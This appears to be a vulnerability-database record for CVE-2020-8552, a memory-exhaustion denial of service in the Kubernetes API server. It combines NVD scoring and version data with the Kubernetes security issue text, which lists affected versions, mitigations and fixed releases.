https://github.com/kubernetes/kubernetes/issues/89377
586,428,637
89,377
1,144
CVE-2020-8552
2020-03-27T15:15:12.757
The Kubernetes API server component in versions prior to 1.15.9, 1.16.0-1.16.6, and 1.17.0-1.17.2 has been found to be vulnerable to a denial of service attack via successful API requests.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 4, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 1.4, "source": "jordan@liggitt.net", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "jordan@liggitt.net", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/89378" }, { "source": "jordan@liggitt.net", "tags": null, "url": "https://groups.google.com/forum/#%21topic/kubernetes-security-announce/2UOlsba2g0s" }, { "source": "jordan@liggitt.net", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3SOCLOPTSYABTE4CLTSPDIFE6ZZZR4LX/" }, { "source": "jordan@liggitt.net", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200413-0003/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/89378" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://groups.google.com/forum/#%21topic/kubernetes-security-announce/2UOlsba2g0s" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3SOCLOPTSYABTE4CLTSPDIFE6ZZZR4LX/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200413-0003/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "07761E41-21F4-466F-A602-4DC9BD1257CE", "versionEndExcluding": null, "versionEndIncluding": "1.15.9", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "02C07F21-ECB7-4BD2-85AF-C2BB24F175FF", "versionEndExcluding": null, "versionEndIncluding": "1.16.6", "versionStartExcluding": null, "versionStartIncluding": "1.16.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "DE0FF258-1EFA-4FF0-84C7-B2976BD70BD3", "versionEndExcluding": null, "versionEndIncluding": "1.17.2", "versionStartExcluding": null, "versionStartIncluding": "1.17.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", "matchCriteriaId": "36D96259-24BD-44E2-96D9-78CE1D41F956", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "770" ]
770
https://github.com/kubernetes/kubernetes/issues/89378
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "kubernetes", "kubernetes" ]
CVSS Rating: [CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) (Medium) The Kubernetes API server has been found to be vulnerable to a denial of service attack via authorized API requests. ### Am I vulnerable? If an attacker that can make an authorized resource request to an unpatched API server (see below), then you are vulnerable to this. Prior to v1.14, this was possible via unauthenticated requests by default. #### Affected Versions - kube-apiserver v1.17.0 - v1.17.2 - kube-apiserver v1.16.0 - v1.16.6 - kube-apiserver < v1.15.10 ### How do I mitigate this vulnerability? Prior to upgrading, this vulnerability can be mitigated by: - Preventing unauthenticated or unauthorized access to all apis - The apiserver should auto restart if it OOMs #### Fixed Versions - v1.17.3 - v1.16.7 - v1.15.10 To upgrade, refer to the documentation: https://kubernetes.io/docs/tasks/administer-cluster/cluster-management/#upgrading-a-cluster #### Acknowledgements This vulnerability was reported by: Gus Lees (Amazon) /area security /kind bug /committee product-security /sig api-machinery
CVE-2020-8552: apiserver DoS (oom)
https://api.github.com/repos/kubernetes/kubernetes/issues/89378/comments
4
2020-03-23T18:35:34Z
2021-12-02T22:55:22Z
https://github.com/kubernetes/kubernetes/issues/89378
586,429,123
89,378
1,145